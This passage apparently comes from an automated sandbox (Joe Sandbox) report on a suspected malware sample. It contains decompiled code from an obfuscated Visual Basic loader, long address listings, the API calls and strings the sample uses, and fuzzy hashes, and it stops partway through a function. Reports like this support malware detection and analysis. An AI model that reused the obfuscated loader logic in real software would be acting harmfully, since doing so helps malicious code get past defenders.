							_t171 = _t390 + 0x765f5f00;
							 *_t171 =  *(_t390 + 0x765f5f00) + _t390;
							__eflags =  *_t171;
							L53:
							if(__eflags <= 0) {
								goto L82;
							}
							asm("popad");
							_t447 = _t447 + 1;
							__eflags = _t447;
							L55:
							if(__eflags < 0) {
								goto L85;
							}
							_push(_t447);
							asm("popad");
							L57:
							if(__eflags < 0) {
								goto L78;
							}
							__eflags =  *(_t371 + 0x74) * 0x1aa0000;
							asm("popad");
							_push(0x5f);
							L59:
							_push(0x5f);
							_t447 =  *[fs:esi+0x5f] * 0x366d;
							_t341 = _t341 ^ 0x00000000;
							__eflags = _t341;
							_t390 = 1;
							goto L60;
						}
						asm("popad");
						_push(_t447);
						asm("popad");
						if(__eflags < 0) {
							L30:
							if(__eflags >= 0) {
								goto L61;
							}
							asm("insb");
							if(__eflags == 0) {
								goto L49;
							}
							_push(0x6b6365);
							L33:
							asm("arpl [gs:ebx], bp");
							goto L34;
						}
						if(__eflags != 0) {
							goto L36;
						}
						 *_t447 =  *_t447 + _t390;
						_t162 = _t398 + 0x5f;
						 *_t162 =  *(_t398 + 0x5f) + _t371;
						__eflags =  *_t162;
						if( *_t162 <= 0) {
							goto L38;
						}
						asm("popad");
						_push(_t390);
						__eflags =  *((intOrPtr*)(_t447 + 0x69)) - _t341;
						if(__eflags < 0) {
							goto L33;
						}
						_t341 = _t341 ^ 0x00000000;
						 *_t371 =  *_t371 + _t390;
						_t379 = _t379 - 1;
						asm("arpl [edi+0x73], bp");
						 *_t341 =  *_t341 + _t341;
						_t371 = 1;
						asm("popad");
						_push(0x5f);
						asm("o16 jo 0x77");
						asm("popad");
						asm("outsb");
						 *_t341 =  *_t341 + _t341;
						__eflags = _t341 - 0x765f5f01;
						asm("bound esp, [ecx+0x53]");
						if(__eflags == 0) {
							goto L55;
						}
						_t379 = _t379 - 1;
						_t341 = _t341 ^ 0x00000000;
						_t165 = _t341 + 1;
						 *_t165 =  *(_t341 + 1) + 1;
						__eflags =  *_t165;
						_pop(_t398);
						if(__eflags <= 0) {
							goto L53;
						}
						asm("popad");
						_push(_t447);
						asm("popad");
						if(__eflags < 0) {
							goto L47;
						}
						asm("outsd");
						if(__eflags <= 0) {
							goto L57;
						}
						 *_t341 =  *_t341 + _t341;
						__eflags =  *_t341;
						_t447 = 0x765f5f00;
						asm("bound esp, [ecx+0x48]");
						if(__eflags < 0) {
							goto L59;
						}
						goto L30;
					}
					_t354 = _t317 +  *_t317;
					__eflags = _t354;
					if(_t354 == 0) {
						_t72 = _t354 - 0x7ffffdd6;
						 *_t72 =  *(_t354 - 0x7ffffdd6) + _t354;
						__eflags =  *_t72;
					}
					_t355 = _t354 -  *_t388;
					 *((intOrPtr*)(_t355 + 0x26780)) =  *((intOrPtr*)(_t355 + 0x26780)) + _t355;
					_t357 = _t355 + _t446[_t371];
					__eflags = _t357 & 0x00000067;
					2();
					_t388 = 0xce;
					asm("popfd");
					asm("adc byte [ecx+0x2], 0x0");
					asm("sbb dl, 0x67");
					0xf842674c();
					_t363 = _t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)) +  *((intOrPtr*)(_t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)))) +  *((intOrPtr*)(_t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)) +  *((intOrPtr*)(_t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)))))) +  *((intOrPtr*)(_t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)) +  *((intOrPtr*)(_t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)))) +  *((intOrPtr*)(_t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)) +  *((intOrPtr*)(_t357 +  *_t357 +  *((intOrPtr*)(_t357 +  *_t357)))))))) + _t446[_t371];
					_t446 = 0xa800002;
					_push(0x681e0002);
					_push(0xa800002);
					_t365 = _t363 +  *_t363 +  *((intOrPtr*)(_t363 +  *_t363));
					__eflags =  *((char*)(_t395 - 0x3f7ffffe)) - 2;
					 *((intOrPtr*)(_t365 - 0x7ffffd3f)) =  *((intOrPtr*)(_t365 - 0x7ffffd3f)) + _t365;
					 *0x000000CE =  *0x000000CE | _t365;
					 *((intOrPtr*)(_t365 - 0x7ffffdf7)) =  *((intOrPtr*)(_t365 - 0x7ffffdf7)) + _t365;
					_t317 = _t365 |  *0x000000CE;
					_t85 = _t317 + 0x26830;
					 *_t85 =  *(_t317 + 0x26830) + _t317;
					__eflags =  *_t85;
					_push(0x20b0002);
					goto L18;
				} else {
					_v44 = _t302;
					_v92 = L"Alabastfabrikkernes3";
					_v100 = 8;
					L004018FC();
					_push(0x78);
					_push( &_v68);
					_push( &_v84);
					L004017DC();
					_push( &_v84);
					L00401908();
					_t376 =  &_v40;
					L0040192C();
					_push( &_v84);
					_t289 =  &_v68;
					_push(_t289);
					_push(2);
					L004018F6();
					_t473 = _t473 + 0xc;
					goto L12;
				}
			}

0x004261e8
0x004261e9
0x004261ed
0x004261f8
0x004261f9
0x00426200
0x00426203
0x00426208
0x0042620b
0x0042620e
0x00426215
0x0042621c
0x00426225
0x00426226
0x0042622b
0x0042622e
0x00426230
0x00426231
0x00426232
0x00426233
0x00426234
0x00426239
0x0042623e
0x00426243
0x00426248
0x0042624d
0x00426252
0x00426253
0x00426258
0x0042625f
0x00426265
0x00426269
0x0042626c
0x00426271
0x00426277
0x0042639b
0x0042639b
0x004263a1
0x004263a2
0x004263a3
0x004263a6
0x004263ab
0x004263ae
0x004263b4
0x004263b5
0x004263e2
0x004263e7
0x004263e7
0x00426284
0x0042629e
0x00426286
0x00426286
0x0042628b
0x00426290
0x00426295
0x00426295
0x004262a5
0x004262aa
0x004262b9
0x004262bc
0x004262be
0x004262c5
0x004262de
0x004262de
0x004262de
0x004262c7
0x004262c7
0x004262c9
0x004262ce
0x004262d1
0x004262d4
0x004262d9
0x004262d9
0x004262e5
0x004262f4
0x004262fa
0x004262fc
0x00426303
0x00426322
0x00426322
0x00426322
0x00426305
0x00426305
0x0042630a
0x0042630f
0x00426312
0x00426315
0x0042631a
0x0042631a
0x0042632c
0x00426331
0x00426335
0x00426338
0x00426340
0x00426345
0x00426405
0x0042640a
0x0042640b
0x0042640c
0x0042640d
0x0042640e
0x0042640f
0x00426410
0x00426411
0x00426412
0x00426413
0x00426414
0x00426416
0x00426418
0x0042641a
0x0042641c
0x0042641e
0x00426420
0x00426423
0x00426425
0x00426427
0x00426429
0x0042642b
0x0042642d
0x0042642f
0x00426431
0x00426433
0x00426435
0x00426437
0x00426439
0x0042643b
0x00426441
0x00426446
0x00426450
0x00426455
0x00426458
0x0042645d
0x00426463
0x00426468
0x0042646b
0x00426470
0x00426473
0x00426476
0x00426478
0x0042647b
0x00426484
0x00426488
0x0042648d
0x0042648f
0x00426492
0x004264a0
0x004264a1
0x004264a3
0x004264a6
0x004264a6
0x004264a6
0x004264ac
0x00426515
0x00426515
0x0042651a
0x00426520
0x00426522
0x0042652f
0x00426534
0x00426537
0x00426539
0x0042653b
0x00426540
0x00426542
0x00426548
0x00426549
0x00426550
0x0042655a
0x0042655c
0x00426562
0x0042656c
0x0042656f
0x00426577
0x0042657b
0x0042658b
0x0042658f
0x00426598
0x00426599
0x0042659b
0x0042659f
0x004265a2
0x004265a8
0x004265aa
0x004265b0
0x004265b3
0x004265b5
0x004265bb
0x004265be
0x004265c4
0x004265c6
0x004265cc
0x004265ce
0x004265d4
0x004265d7
0x004265dd
0x004265df
0x004265e2
0x004265e4
0x004265e7
0x004265ea
0x004265ec
0x004265ed
0x004265ef
0x004265f2
0x004265f2
0x004265f2
0x004265f8
0x004265fa
0x004265fc
0x00426601
0x00426603
0x0042660a
0x00426610
0x00426611
0x00426613
0x00426619
0x0042661b
0x0042661f
0x00426624
0x00426625
0x00426627
0x00426629
0x0042662b
0x00426631
0x00426633
0x00426636
0x0042663c
0x0042663d
0x0042663f
0x0042664c
0x0042664f
0x00426654
0x00426656
0x0042665c
0x00426661
0x00426661
0x00426664
0x0042666a
0x00426670
0x00426678
0x00426681
0x00426683
0x00426686
0x00426689
0x0042668a
0x0042668b
0x0042668d
0x0042668e
0x00426693
0x00426694
0x00426696
0x00426699
0x0042669a
0x004266fe
0x004266fe
0x00426701
0x00426702
0x00426766
0x00426766
0x00426767
0x00426768
0x0042676b
0x0042676b
0x0042676d
0x0042676d
0x004267d4
0x004267d4
0x0042684b
0x0042684b
0x0042684e
0x0042684e
0x0042684f
0x00426850
0x00426850
0x00426850
0x00426850
0x004267d6
0x004267da
0x004267da
0x004267da
0x004267dd
0x004267de
0x00426842
0x00426842
0x004268a7
0x004268a8
0x0042690c
0x0042690c
0x0042690f
0x00426912
0x00426913
0x00426916
0x00426979
0x00426979
0x004269df
0x004269e0
0x00426a44
0x00426a45
0x00426a46
0x00426a46
0x00426aaa
0x00426aaa
0x00426aac
0x00426aad
0x00426ab0
0x00426abc
0x00426abe
0x00426abf
0x00426abf
0x00426abf
0x00426ac4
0x00426ac5
0x00426acd
0x00426acd
0x00426acd
0x00426ad0
0x00426b34
0x00426b34
0x00426b35
0x00426b35
0x00426b35
0x00426b38
0x00426b39
0x00426b39
0x00426b39
0x00426ad2
0x00426ad3
0x00426ad4
0x00426ad5
0x00426b2b
0x00426b2b
0x00426b2e
0x00426b2e
0x00426b2f
0x00426b30
0x00426b93
0x00426b94
0x00426bf8
0x00426bf8
0x00426bfa
0x00426bfc
0x00426bfe
0x00426bfe
0x00426bff
0x00426bff
0x00426bff
0x00426bff
0x00426b96
0x00426b97
0x00426b98
0x00000000
0x00000000
0x00426b9a
0x00426b9a
0x00426b9c
0x00426b9f
0x00426ba1
0x00426ba3
0x00426ba5
0x00426ba5
0x00426ba7
0x00426ba9
0x00426bab
0x00426bab
0x00426bac
0x00426bac
0x00426bae
0x00426bae
0x00426bb0
0x00426bb2
0x00426bb4
0x00426bb6
0x00426bb8
0x00426bba
0x00426bbc
0x00426bbe
0x00426bc0
0x00426bc2
0x00426bc4
0x00426bc4
0x00426bc6
0x00426bc6
0x00426bc8
0x00426bc8
0x00426bc9
0x00426bc9
0x00426bcb
0x00426bcd
0x00426bcf
0x00426bcf
0x00426bd0
0x00426bd0
0x00426bd2
0x00426bd4
0x00426bd6
0x00426bd8
0x00426bda
0x00426bdc
0x00426bde
0x00426be0
0x00426be2
0x00426be4
0x00426be6
0x00426be6
0x00426be8
0x00426bea
0x00426bec
0x00426bec
0x00426bee
0x00426bee
0x00426bee
0x00426bef
0x00426bf1
0x00426bf3
0x00426bf5
0x00426bf7
0x00426bf7
0x00000000
0x00426bf7
0x00426b32
0x00426b33
0x00426b33
0x00000000
0x00426b33
0x00426ad7
0x00426b4d
0x00426b4d
0x00426b4d
0x00426b4e
0x00426b4f
0x00000000
0x00000000
0x00426b51
0x00426b51
0x00426b52
0x00426b52
0x00426b52
0x00426b54
0x00426b57
0x00426b58
0x00426b59
0x00426b5a
0x00426b5b
0x00000000
0x00000000
0x00426b5d
0x00426b60
0x00426b61
0x00426b62
0x00426b62
0x00426b63
0x00426b63
0x00000000
0x00000000
0x00426b65
0x00426b66
0x00426b66
0x00426b67
0x00426b67
0x00426b67
0x00426b67
0x00426b6c
0x00426b6c
0x00000000
0x00000000
0x00426b6e
0x00426b6f
0x00426b70
0x00426b71
0x00426b71
0x00426b72
0x00426b73
0x00426b75
0x00426b79
0x00426b7a
0x00426b7b
0x00426b7c
0x00426b7c
0x00000000
0x00000000
0x00426b7e
0x00426b80
0x00426b81
0x00426b81
0x00426b81
0x00426b84
0x00426b84
0x00426b85
0x00426b85
0x00426b85
0x00426ad9
0x00426ada
0x00426add
0x00426add
0x00426add
0x00426ade
0x00426ae0
0x00426b44
0x00426b47
0x00426b48
0x00000000
0x00000000
0x00426b4a
0x00426b4b
0x00426b4b
0x00426b4c
0x00000000
0x00426b4c
0x00426ae2
0x00426ae3
0x00426ae4
0x00426ae4
0x00426ae6
0x00426ae7
0x00426ae9
0x00426ae9
0x00426ae9
0x00426aed
0x00426aee
0x00000000
0x00000000
0x00426af0
0x00426af1
0x00426af2
0x00426af2
0x00426af3
0x00000000
0x00000000
0x00426af5
0x00000000
0x00000000
0x00426af7
0x00426af7
0x00426af7
0x00426afd
0x00426b00
0x00000000
0x00000000
0x00426b02
0x00426b04
0x00426b04
0x00426b05
0x00426b05
0x00426b05
0x00426b06
0x00426b07
0x00426b08
0x00000000
0x00000000
0x00426b0a
0x00426b0a
0x00426b0b
0x00426b0c
0x00426b0d
0x00000000
0x00000000
0x00426b0f
0x00000000
0x00000000
0x00426b11
0x00426b12
0x00426b15
0x00426b15
0x00426b15
0x00426b18
0x00000000
0x00000000
0x00426b1a
0x00426b1b
0x00426b1c
0x00426b1d
0x00000000
0x00000000
0x00426b20
0x00426b22
0x00426b22
0x00426b23
0x00426b24
0x00426b25
0x00426b27
0x00426b27
0x00426b2a
0x00000000
0x00426b2a
0x00426a48
0x00426a49
0x00426a4a
0x00426a4b
0x00426a7f
0x00426a7f
0x00000000
0x00000000
0x00426a80
0x00426a80
0x00426a80
0x00426a4d
0x00426a4e
0x00426a51
0x00426a51
0x00426a51
0x00426a52
0x00426a57
0x00426a59
0x00426a59
0x00426a5e
0x00426a61
0x00426a61
0x00426a67
0x00426a6a
0x00426a72
0x00426a72
0x00426a73
0x00426a73
0x00426a73
0x00426a76
0x00426a76
0x00426a77
0x00426a77
0x00426a77
0x00426a79
0x00426a79
0x00426a7a
0x00000000
0x00000000
0x00426a7c
0x00426a7d
0x00426a7e
0x00000000
0x00426a7e
0x004269e2
0x004269e2
0x004269e3
0x004269e4
0x004269e7
0x004269e8
0x004269e8
0x004269e8
0x004269ed
0x004269ed
0x004269ee
0x004269ef
0x004269ef
0x004269ef
0x0042697a
0x0042697a
0x00000000
0x00000000
0x0042697c
0x0042697d
0x00426980
0x00426982
0x00426983
0x00426984
0x00000000
0x00000000
0x00426986
0x00426987
0x00426987
0x00426988
0x00000000
0x00000000
0x0042698a
0x00426a01
0x00426a07
0x00426a07
0x0042698d
0x0042698e
0x0042698f
0x00426990
0x00426990
0x00426992
0x00426995
0x0042699b
0x0042699d
0x004269a0
0x004269a2
0x004269a2
0x004269a4
0x004269a4
0x004269a5
0x004269a8
0x004269ab
0x004269ab
0x004269af
0x004269af
0x00426a10
0x00000000
0x00000000
0x00426a11
0x00000000
0x00000000
0x00426a13
0x00426a14
0x00426a15
0x00426a17
0x00426a1d
0x00426a1e
0x00426a1e
0x00426a1f
0x00426a20
0x00426a25
0x00426a25
0x00426a27
0x00426a29
0x00426a29
0x00426a29
0x00426a2c
0x00426a90
0x00426a92
0x00000000
0x00000000
0x00426a94
0x00426a95
0x00426a95
0x00426a9d
0x00426a9e
0x00426a9e
0x00000000
0x00000000
0x00426aa0
0x00426aa1
0x00426aa2
0x00000000
0x00000000
0x00426aa5
0x00426aa5
0x00426aa6
0x00426aa6
0x00426aa6
0x00426aa7
0x00000000
0x00000000
0x00426aa9
0x00426aa9
0x00000000
0x00426aa9
0x00426a2e
0x00426a2f
0x00426a2f
0x00426a30
0x00426a31
0x00426a32
0x00426a32
0x00000000
0x00000000
0x00426a34
0x00426a36
0x00426a39
0x00426a39
0x00426a3a
0x00000000
0x00000000
0x00426a3c
0x00426a3d
0x00426a3d
0x00426a3e
0x00000000
0x00000000
0x00426a41
0x00426a41
0x00426a41
0x00000000
0x00426a41
0x004269b1
0x004269b2
0x004269b2
0x004269b4
0x004269b4
0x004269b6
0x004269b6
0x004269b6
0x004269b7
0x004269b7
0x004269b7
0x004269ba
0x00000000
0x00000000
0x004269bc
0x004269bd
0x004269be
0x004269bf
0x004269c0
0x00000000
0x00000000
0x004269c2
0x00000000
0x00000000
0x004269c5
0x004269c5
0x004269cd
0x004269ce
0x00000000
0x00000000
0x004269d0
0x004269d1
0x004269d2
0x004269d2
0x00000000
0x00000000
0x004269d4
0x004269d5
0x004269d6
0x004269d7
0x004269d7
0x004269d7
0x00426918
0x00426918
0x00426919
0x0042691b
0x0042691b
0x0042691b
0x0042691e
0x00000000
0x00000000
0x00426920
0x00426921
0x00426922
0x00426922
0x00426926
0x00426926
0x00426928
0x00426929
0x00426929
0x00426929
0x0042692c
0x0042692c
0x00000000
0x00000000
0x0042692e
0x0042692f
0x00426930
0x00000000
0x00000000
0x00426932
0x00426933
0x00426933
0x00426935
0x0042693c
0x0042693e
0x0042693f
0x00426940
0x00426940
0x00426941
0x00426941
0x00426941
0x00426942
0x00426943
0x00426944
0x00426944
0x00426946
0x00426948
0x00000000
0x00000000
0x0042694a
0x0042694a
0x0042694c
0x0042694c
0x0042694d
0x0042694d
0x0042694d
0x00426950
0x00000000
0x00000000
0x00426952
0x00426953
0x00426954
0x00426954
0x00426955
0x00426955
0x00426955
0x00426955
0x00426958
0x00426958
0x0042695a
0x0042695b
0x0042695e
0x0042695e
0x0042695f
0x00000000
0x00000000
0x00426961
0x00000000
0x00000000
0x00426963
0x00426963
0x00426963
0x00426966
0x00426967
0x00426968
0x0042696a
0x0042696d
0x0042696e
0x0042696f
0x0042696f
0x00426970
0x00426971
0x00426972
0x004269d9
0x004269da
0x004269dc
0x004269dd
0x004269dd
0x004269dd
0x00000000
0x004269dd
0x00426974
0x00000000
0x00000000
0x00426976
0x00426976
0x00426977
0x00426978
0x00000000
0x00426978
0x004268aa
0x004268ab
0x004268ac
0x004268e2
0x004268e2
0x004268e3
0x004268e3
0x004268e4
0x004268e7
0x004268e8
0x00000000
0x00000000
0x004268ea
0x004268ec
0x004268ef
0x004268f1
0x004268f1
0x004268f1
0x004268f4
0x00000000
0x00000000
0x004268f6
0x004268f6
0x004268f7
0x004268f8
0x004268fb
0x004268fc
0x004268fc
0x004268fe
0x004268ff
0x004268ff
0x004268ff
0x00426902
0x00000000
0x00000000
0x00426904
0x00426905
0x00426906
0x00000000
0x00000000
0x00426908
0x00426909
0x0042690b
0x0042690b
0x0042690b
0x00000000
0x0042690b
0x004268af
0x004268af
0x004268af
0x004268b3
0x004268b4
0x00000000
0x00000000
0x004268b6
0x004268b7
0x004268b8
0x00000000
0x00000000
0x004268bb
0x004268bc
0x004268be
0x004268bf
0x004268bf
0x004268bf
0x004268c2
0x00000000
0x00000000
0x004268c4
0x004268c5
0x004268c5
0x004268c6
0x00000000
0x00000000
0x004268c8
0x004268c9
0x004268ca
0x004268ca
0x004268cb
0x00000000
0x00000000
0x004268cd
0x00000000
0x00000000
0x004268cf
0x004268d3
0x004268d3
0x004268d3
0x004268d9
0x004268dc
0x004268dd
0x00000000
0x00000000
0x004268df
0x00000000
0x00000000
0x004268e1
0x004268e1
0x00000000
0x004268e1
0x00426844
0x00426845
0x00426845
0x00426846
0x0042689a
0x0042689a
0x0042689a
0x00426848
0x00426848
0x00426849
0x00426849
0x00426849
0x00000000
0x00426849
0x004267e0
0x004267e1
0x004267e1
0x004267e2
0x004267e5
0x004267e8
0x004267e8
0x004267e8
0x004267e9
0x004267e9
0x004267e9
0x004267e9
0x004267ec
0x00000000
0x00000000
0x004267ee
0x004267ee
0x004267ef
0x004267ef
0x004267f0
0x004267f1
0x004267f1
0x004267f2
0x00426866
0x00000000
0x00000000
0x00426868
0x00426869
0x0042686a
0x00426872
0x00426872
0x00426874
0x00426877
0x00426878
0x0042687a
0x0042687d
0x0042687e
0x0042687f
0x0042687f
0x00426880
0x00426881
0x00426881
0x00426882
0x00426885
0x0042688e
0x0042688f
0x0042688f
0x00426890
0x00426892
0x00000000
0x00000000
0x00426895
0x00000000
0x00000000
0x00426897
0x00426897
0x00426898
0x00426898
0x00426899
0x00000000
0x00426899
0x004267f4
0x004267f5
0x004267f7
0x004267fd
0x004267ff
0x00426800
0x00426800
0x00426800
0x00426801
0x00426801
0x00426808
0x0042680a
0x0042680a
0x0042680d
0x0042680e
0x00000000
0x00000000
0x00426810
0x00426810
0x00426811
0x00426811
0x00426812
0x00426815
0x00426859
0x00426859
0x00426818
0x00426819
0x00426819
0x00000000
0x00000000
0x0042681c
0x00426825
0x0042682c
0x0042682c
0x0042682e
0x0042682e
0x0042682e
0x00426834
0x00000000
0x00000000
0x00426836
0x00426839
0x0042683a
0x00426841
0x00000000
0x00426841
0x0042676f
0x00426770
0x00426772
0x00426772
0x00426775
0x00426776
0x00426776
0x00000000
0x00000000
0x00426778
0x00426779
0x00426779
0x0042677a
0x00000000
0x00000000
0x0042677c
0x0042677c
0x0042677d
0x0042677e
0x00426780
0x00426781
0x00426781
0x00426781
0x00426781
0x00426784
0x00000000
0x00000000
0x00426786
0x00426786
0x00426787
0x00426787
0x00426788
0x00000000
0x00000000
0x0042678a
0x00000000
0x00000000
0x0042678c
0x0042678d
0x004267d2
0x004267d2
0x00000000
0x00000000
0x00000000
0x004267d2
0x0042678f
0x00426791
0x00426791
0x00426794
0x00426794
0x00426797
0x00426797
0x00426798
0x0042679a
0x0042679b
0x0042679b
0x0042679c
0x00000000
0x00000000
0x0042679e
0x0042679f
0x004267a0
0x004267a2
0x004267a2
0x004267a3
0x00000000
0x00000000
0x004267a5
0x00000000
0x00000000
0x004267a7
0x004267a7
0x004267a8
0x004267ab
0x004267ac
0x00000000
0x00000000
0x004267ae
0x004267af
0x004267af
0x004267b0
0x004267b0
0x004267b1
0x004267b1
0x004267b2
0x004267b3
0x004267b4
0x004267b6
0x004267b8
0x004267b9
0x004267bd
0x004267c4
0x004267c6
0x004267c7
0x004267c7
0x004267c7
0x004267ca
0x00000000
0x00000000
0x004267cc
0x004267cd
0x004267cd
0x004267ce
0x00000000
0x00000000
0x004267d0
0x004267d1
0x00000000
0x004267d1
0x00426704
0x00426705
0x00426705
0x00426705
0x00426706
0x00000000
0x00000000
0x00426708
0x0042670a
0x0042670b
0x0042670c
0x0042670c
0x0042670c
0x0042670d
0x0042670d
0x00426711
0x00426712
0x00000000
0x00000000
0x00426714
0x00426715
0x00426715
0x00426716
0x00000000
0x00000000
0x00426718
0x00426718
0x00426719
0x0042671a
0x00000000
0x00000000
0x0042671c
0x0042671e
0x0042671f
0x0042671f
0x0042671f
0x00426722
0x00000000
0x00000000
0x00426724
0x00426725
0x00426726
0x00000000
0x00000000
0x00426728
0x00426729
0x0042672a
0x00000000
0x00000000
0x0042672c
0x0042672d
0x00000000
0x00000000
0x0042672f
0x00426731
0x00426731
0x00426731
0x00426732
0x00426734
0x00000000
0x00000000
0x00426736
0x00426737
0x00426738
0x0042673a
0x0042673a
0x0042673b
0x0042673c
0x0042673c
0x00000000
0x00000000
0x0042673d
0x00000000
0x00000000
0x0042673e
0x0042673e
0x0042673f
0x0042673f
0x0042673f
0x00426742
0x00426744
0x00000000
0x00000000
0x00426746
0x00426747
0x00426747
0x00426748
0x00426748
0x00000000
0x00000000
0x0042674a
0x0042674c
0x0042674d
0x0042674d
0x00000000
0x00000000
0x0042674f
0x00426757
0x00426758
0x00426759
0x00426759
0x0042675b
0x00426762
0x00426762
0x00426764
0x00000000
0x00426764
0x0042669c
0x0042669d
0x0042669e
0x0042669f
0x004266f4
0x004266f4
0x00000000
0x00000000
0x004266f6
0x004266f7
0x00000000
0x00000000
0x004266f9
0x004266fa
0x004266fa
0x00000000
0x004266fa
0x004266a1
0x00000000
0x00000000
0x004266a3
0x004266a5
0x004266a5
0x004266a5
0x004266a8
0x00000000
0x00000000
0x004266aa
0x004266ab
0x004266ac
0x004266af
0x00000000
0x00000000
0x004266b1
0x004266b3
0x004266b8
0x004266b9
0x004266bc
0x004266be
0x004266c1
0x004266c2
0x004266c5
0x004266c8
0x004266c9
0x004266ca
0x004266cc
0x004266d1
0x004266d4
0x00000000
0x00000000
0x004266d6
0x004266d7
0x004266d9
0x004266d9
0x004266d9
0x004266dd
0x004266de
0x00000000
0x00000000
0x004266e0
0x004266e1
0x004266e2
0x004266e3
0x00000000
0x00000000
0x004266e5
0x004266e6
0x00000000
0x00000000
0x004266e8
0x004266e8
0x004266ea
0x004266ef
0x004266f2
0x00000000
0x00000000
0x00000000
0x004266f2
0x004264ae
0x004264ae
0x004264b0
0x004264b2
0x004264b2
0x004264b2
0x004264b2
0x004264b4
0x004264b6
0x004264bd
0x004264c0
0x004264c8
0x004264cf
0x004264d4
0x004264d7
0x004264db
0x004264e0
0x004264e5
0x004264e8
0x004264ed
0x004264f4
0x004264f5
0x004264f7
0x004264fe
0x00426504
0x00426506
0x0042650c
0x0042650e
0x0042650e
0x0042650e
0x00426514
0x00000000
0x0042634b
0x0042634b
0x0042634e
0x00426355
0x00426362
0x00426367
0x0042636c
0x00426370
0x00426371
0x00426379
0x0042637a
0x00426381
0x00426384
0x0042638c
0x0042638d
0x00426390
0x00426391
0x00426393
0x00426398
0x00000000
0x00426398

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 00426203
__vbaChkstk.MSVBVM60 ref: 00426226
#689.MSVBVM60(Frugtfarvers1,Vince1,FORMALIAS), ref: 00426243
__vbaStrMove.MSVBVM60(Frugtfarvers1,Vince1,FORMALIAS), ref: 0042624D
__vbaStrCmp.MSVBVM60(Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426258
__vbaFreeStr.MSVBVM60(Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 0042626C
__vbaNew2.MSVBVM60(00403C1C,00427544,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426290
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C0C,00000014,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 004262D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C2C,00000118,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426315
__vbaI2I4.MSVBVM60(?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 0042632C
__vbaFreeObj.MSVBVM60(?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426338
__vbaVarDup.MSVBVM60(?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426362
#619.MSVBVM60(?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426371
__vbaStrVarMove.MSVBVM60(?,?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 0042637A
__vbaStrMove.MSVBVM60(?,?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426384
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,00000078,?,?,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 00426393
#586.MSVBVM60(?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 004263A6
__vbaFreeStr.MSVBVM60(004263E8,?,?,Buzylene,00000000,Frugtfarvers1,Vince1,FORMALIAS), ref: 004263E2

Strings

Vince1, xrefs: 00426239
Alabastfabrikkernes3, xrefs: 0042634E
DuB, xrefs: 004262A5
FORMALIAS, xrefs: 00426234
Buzylene, xrefs: 00426253
Frugtfarvers1, xrefs: 0042623E

Memory Dump Source

Source File: 00000000.00000002.1189901321.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1189897994.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189918229.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189922002.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1189925615.000000000042B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G47wmLn8uy.jbxd

Similarity

API ID: __vba$Free$Move$CheckChkstkHresult$#586#619#689ListNew2
String ID: Alabastfabrikkernes3$Buzylene$DuB$FORMALIAS$Frugtfarvers1$Vince1
API String ID: 1624493403-2562244405
Opcode ID: 94e1f129fc792fa6f5103ff915640e43576cf97207cf648ca51283219fba019a
Instruction ID: d1eeccd6a81275c9f79f28f8e3a7bfee38bca218a038e7ee877bbb3d07f8b17b
Opcode Fuzzy Hash: 94e1f129fc792fa6f5103ff915640e43576cf97207cf648ca51283219fba019a
Instruction Fuzzy Hash: AD512971E40228AECB10EFE1DC46AEEBBB5BF08704F60412EE105BB1A1DB785945DB58

Uniqueness

Uniqueness Score: -1.00%

Function 00422770, Relevance: 43.9, APIs: 22, Strings: 3, Instructions: 133
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 59%

			E00422770(void* __ebx, void* __ecx, void* __edi, void* __esi, signed int* _a20) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v40;
				void* _v44;
				char* _v48;
				void* _v52;
				signed int _v56;
				signed int _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v104;
				intOrPtr _v128;
				char _v136;
				signed int _v144;
				signed int _v148;
				short _v152;
				signed int _v176;
				signed int _v180;
				signed int _t61;
				short _t63;
				char* _t66;
				void* _t76;
				void* _t92;
				intOrPtr _t93;
				signed int _t99;
				char _t101;

				_t76 = __ecx;
				_t93 = _t92 - 0x18;
				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t93;
				L004015F0();
				_v28 = _t93;
				_v24 = 0x401428;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				 *_a20 =  *_a20 & 0x00000000;
				_v8 = 2;
				_t99 =  *0x401470;
				_push(__ecx);
				_push(__ecx);
				_v56 = _t99;
				L0040179A();
				_v144 = _t99;
				_v64 = _v144;
				_v72 = 5;
				_push( &_v88);
				_t61 =  &_v72;
				_push(_t61);
